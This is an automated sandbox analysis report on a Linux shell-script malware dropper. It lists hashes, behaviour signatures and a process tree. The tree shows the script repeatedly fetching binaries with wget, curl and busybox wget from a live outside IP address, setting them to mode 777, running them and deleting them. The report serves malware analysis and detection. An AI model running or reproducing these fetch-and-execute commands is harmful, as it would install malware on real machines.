Analysis
-
max time kernel
89s -
max time network
92s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/11/2024, 04:06
Static task
static1
Behavioral task
behavioral1
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
-
Size
10KB
-
MD5
2c8ee73ff481383ca124810fef8653b1
-
SHA1
2f0045a1346635e0b97b189a217d60329572ee9c
-
SHA256
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94
-
SHA512
a4cf9a0c5f3fcb4bbc802490023c07e2cdfe73a8a6d3d4903e7e952967325270f6f4a0bf912b58844b8655e30ba7832a39dc377a73ed4443b77740b6584ad8ad
-
SSDEEP
192:mrPM5ZTjn81dBLvdLvgaD6DGDN2uVFxFxFcj/flNzu7ui07gQ27wgRNKW5z7MUzm:jiC2N2uKu4OxTHC2N2uwCo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 820 chmod 898 chmod 940 chmod 748 chmod 796 chmod 880 chmod 892 chmod 904 chmod 934 chmod 832 chmod 852 chmod 952 chmod 970 chmod 982 chmod 826 chmod 916 chmod 928 chmod 964 chmod 976 chmod 886 chmod 946 chmod 958 chmod 742 chmod 754 chmod 773 chmod 873 chmod 910 chmod 922 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY 743 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD 749 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa 755 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx 774 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL 798 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I 821 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo 827 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa 833 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a 853 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp 875 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR 881 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p 887 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA 893 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY 899 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo 905 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa 911 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a 917 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp 923 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR 929 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p 935 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA 941 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY 947 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY 953 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD 959 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa 965 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx 971 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL 977 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I 983 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa curl File opened for modification /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp curl File opened for modification /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD curl File opened for modification /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY curl File opened for modification /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD curl File opened for modification /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p curl File opened for modification /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA curl File opened for modification /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY curl File opened for modification /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL curl File opened for modification /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I curl File opened for modification /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx curl File opened for modification /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL curl File opened for modification /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo curl File opened for modification /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR curl File opened for modification /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo curl File opened for modification /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa curl File opened for modification /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA curl File opened for modification /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a curl File opened for modification /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p curl File opened for modification /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a curl File opened for modification /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp curl File opened for modification /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx curl File opened for modification /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa curl File opened for modification /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I curl File opened for modification /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY curl File opened for modification /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR curl File opened for modification /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY curl File opened for modification /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa curl
Processes
-
/tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh/tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:721
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:741
-
-
/bin/chmodchmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:747
-
-
/bin/chmodchmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:753
-
-
/bin/chmodchmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:756
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:758
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:770
-
-
/bin/chmodchmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:777
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:779
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:783
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:792
-
-
/bin/chmodchmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:801
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:802
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:818
-
-
/bin/chmodchmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:825
-
-
/bin/chmodchmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:829
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:831
-
-
/bin/chmodchmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:835
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:849
-
-
/bin/chmodchmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:856
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:857
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:870
-
-
/bin/chmodchmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:879
-
-
/bin/chmodchmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:885
-
-
/bin/chmodchmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:891
-
-
/bin/chmodchmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:897
-
-
/bin/chmodchmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:903
-
-
/bin/chmodchmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:909
-
-
/bin/chmodchmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:915
-
-
/bin/chmodchmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:921
-
-
/bin/chmodchmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp2⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:927
-
-
/bin/chmodchmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:933
-
-
/bin/chmodchmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:939
-
-
/bin/chmodchmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA2⤵PID:942
-
-
